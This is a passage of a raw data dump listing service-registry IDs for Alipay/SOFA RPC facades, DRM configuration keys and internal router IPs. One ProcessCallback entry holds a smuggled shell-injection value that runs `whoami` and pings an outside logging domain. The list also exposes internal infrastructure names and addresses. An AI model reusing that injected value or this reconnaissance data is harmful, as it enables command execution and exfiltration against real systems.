OFA.DRM","Alipay.tradeapcore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:quoteSyncTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:yunfengdieproxy#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finance.goldetfprod.common.service.facade.GoldProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcplan.common.service.facade.api.PlanOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.etetestcore:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:funsavemoneytwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.209.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instopen.service.facade.InstAcctSettleService:1.0:instopen@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pkgcore.common.service.facade.PackageOperateForOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardsales.common.service.facade.PcardSalesOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.CheckIndexServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityOperationRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.cdecision.label.facade.CustomerLabelSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstInfoInvokeService:1.0:autoaftermarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.merchant.member.facade.api.MemberRelationInfoOpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.QrCodeLifeCycleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.common.quickaccess.facade.service.open.OpenServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.cache.service.FailoverSwitchCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:mrchstm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.CombineUrlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchantsettle.common.service.facade.api.SettleManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.171.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.queryProduct,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.swiftweb.facade.ServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.pcardsales.biz.shared.resource.OpenInvestorMinitransAccountDrmResource.inverstorUserId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findtprod:name=com.alipay.kmi.client.cache.refresher.keyName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.GroupService:1.0:groupService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.international.detail.AccountDetailManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdatalink.common.service.facade.datalink.SolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finslip.finfluxObDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:insservicbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.baoxianprod.common.facade.BizAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfundprod.common.service.facade.FundAbnormalLabelQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.paymentmng.core.cache.drm.FunctionControlDRMControl.paymentQuery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.138.253#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.gftms.facade.api.basic.outer.BankAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_F_INTCLCN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bizprodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.icifTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.145.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.caprod.service.cert.facade.CertServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.dm.DimensionalModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.WorkFlowProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igmatrix.common.service.facade.ConnectCaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.SingleCollectFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:mrchstoreapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.55.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.video.api.ShortVideoOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.crowd.LifeCrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CONTROL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.contentlib.common.service.facade.ny.NyCallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-18#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.165.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.financeprod.service.facade.PartnerServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopCacheConfig.cacheVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zskynet.facade.fullpath.service.ServiceIdMappingMgrFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.common.manage.facade.api.template.SceneTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.MacDRMResource.auditSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecbill.common.service.loan.LoanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.FeatureInfoConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.manage.facade.BudgetLibQueryManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanDisbCmdThreadPool.data,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assetxp.common.service.facade.api.AssetExchangeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.payment.KmallColumnContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.prod.common.service.facade.api.account.JointAccountBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mordercenter.common.service.facade.api.OrderModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lego.common.service.facade.activity.ActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_OPEN_APP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.acquirecenter.common.service.facade.api.NetworkPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngCommodityCloudServiceOnlineInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_CT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dpc.smartbiz.process.service.ProcessQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoitem.common.manage.facade.api.ItemStorageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcenter.common.dal.mcenter.auto.daointerface.TradeFundBillDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.trans.api.FundTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.MerchantCardTemplateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundWebsiteCustomerInfoMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.238.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.chaos.dig.facade.code.CodeRepoFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fincompose.common.service.facade.remedy.MessageRemdyService:1.0:remedyFinCompose@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkqamng_offline_info_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","antassistant@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.developerops.facade.api.OpsActivityApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobatch.spi.adapter.facade.CallbackSpiFacade:1.0:promoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcprodbx-insmobile:name=com.alipay.fc.prodbx.common.drm.impl.DrmResourceServiceImpl.closeRefreshCacheFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:gfmac@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:record-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.namelist.NameListQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepluban.common.service.facade.risk.PreciseAttackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsmp.common.service.facade.privilege.service.v2.demote.DemoteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.config.center.DeployRecordQueryService:1.0:stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.ops.AppServerOpsFacade:1.0:SERVERLESS_PAAS_SPI@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.AttachmentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.selection.SelectionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.http.SceneApplyHttpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fxci.FICIRightsInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue38#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finscprod.facade.sector.SectorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbminiapp.common.service.facade.tr.other.CommonApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.ReleaseWindowsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecsa.common.service.facade.ItemQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.product.DrawndnMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.biz.facade.api.TeamRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:socialcore_budgetApplyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkdeviceinfo.common.service.facade.device.DeviceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AuthManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";ping `whoami`MzMwMjQ4NjktdW5pcXVlSWQtMTA0MDAzMDM1.ssrf.noble.log.lynnshare.cc;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.checkcode.CheckCodeImageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.BizPlatformInquiryFacade:1.0:zmarBizPlatformInquiryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.facade.service.BioFileService:1.0:zhubglobal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.news.isDisableNewsSpecialListAfwealthAV,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-finagendatwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.partner.api.PartnerUserIdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.custassetTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:antsecurity_mctu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone_dest.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.common.service.facade.comment.TagUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qualitymeasure.service.facade.api.AcpProjectSystemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recneptune.core.service.cache.ConfigDataCacheService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.220.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insttrade:name=com.alipay.insttrade.core.service.cache.DrmMappingRuleCacheRefresh.mybankConfigCacheRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileacauth.service.facade.QueryTrustLoginTokenService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:mrchiscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transfercenter.common.service.facade.api.TransferConfigFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.OrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:view-render@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.trigger.FinCampTriggerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.publicaccount.ContentPublicAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.OstsProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.137.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antfinancial.antchain.cloud.endpoint.facade.CloudIdeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.ProductGovFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.ElasticDBSourceMsgSubDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:publichome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.coffeepayweb:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.dataservice.service.RiskDataService:1.0:nameList@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcore.service.repay.PcreditRepayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdepbuss.common.facade.AccountArrangementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.antPolicyEntranceDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.0.148.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_C_ANTFOREST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insserviceprod.facade.InsSerProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesync.common.service.facade.api.MobileSyncPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectprod.biz.service.drm.CacheDRM:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accrmcore.common.service.facade.CRMRemarkInfoFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.instinfo.service.facade.spi.InstInfoInvokeService:1.0:finbatch@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.shadowKeySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.equitypublishcore.common.service.facade.api.AgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbconfigcenter.common.service.facade.api.entity.EntityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.LoginAppService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.cicada.facade.api.MerchantVerifyRateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.LovingHeartBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.BusinessService:1.0:businessService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.func.service.ServerlessConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.TransferToAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.drc.rm.endpoint.openapi.VpcOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbaservice.common.service.facade.partner.api.PartnerUserIdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.portal.common.service.facade.repeat.RepeatAssetsCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.goods.TopicGoodsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_ats_riskTaskFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.serverlesscore.endpoint.dds.rpc.service.MsgBrokerJzCallBackRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:globalremitprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.trade.AdmSystemParamFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cardbin.common.service.facade.CardBinOverseaValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:dayutrprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.opencommon.rcache.facade.RCacheClearQueueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.airbops:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opencore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.176.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.244.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.131.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.227.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapires.facade.monitor.AlertIndicatorManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdtunical.common.service.facade.http.TaskRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secucommunity.common.service.facade.user.api.SecuUserQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.pushProd2WhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.publishing.common.facade.upgrade.PublishUpgradeApi:1.0:dataphin-publishing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicCiOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finstrategy:name=com.alipay.finstrategy.common.service.facadeseven.fixedinvestment.drm.SimulatorConfigDrmImpl.switch2SimulateJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbdatacenter.common.service.facade.tag.metadata.TagMetadataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.RankQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSwitchControlDRMResource.hkStableSwitchPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_CHARITYPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.insdataprod.common.service.facade.hospital.api.InsHospitalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.lifemng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.51.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dbackprod.service.facade.api.ManualAdvanceDbackService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custview.facade.ClassificationViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finslip:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mquery.common.service.facade.report.TradeReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:myexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.SceneProductStrategyConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeLogisticsQueryFacade:1.0:tradequeryprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkimagediscern.facade.massif.api.MassifService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lightmds.service.mds.MdsQueryTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpunish.common.service.facade.approval.ApprovalProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_REWARD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fporgassetcenter.common.service.facade.api.AssetOperateMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ToolTemplateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.SatisfactionDegreeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP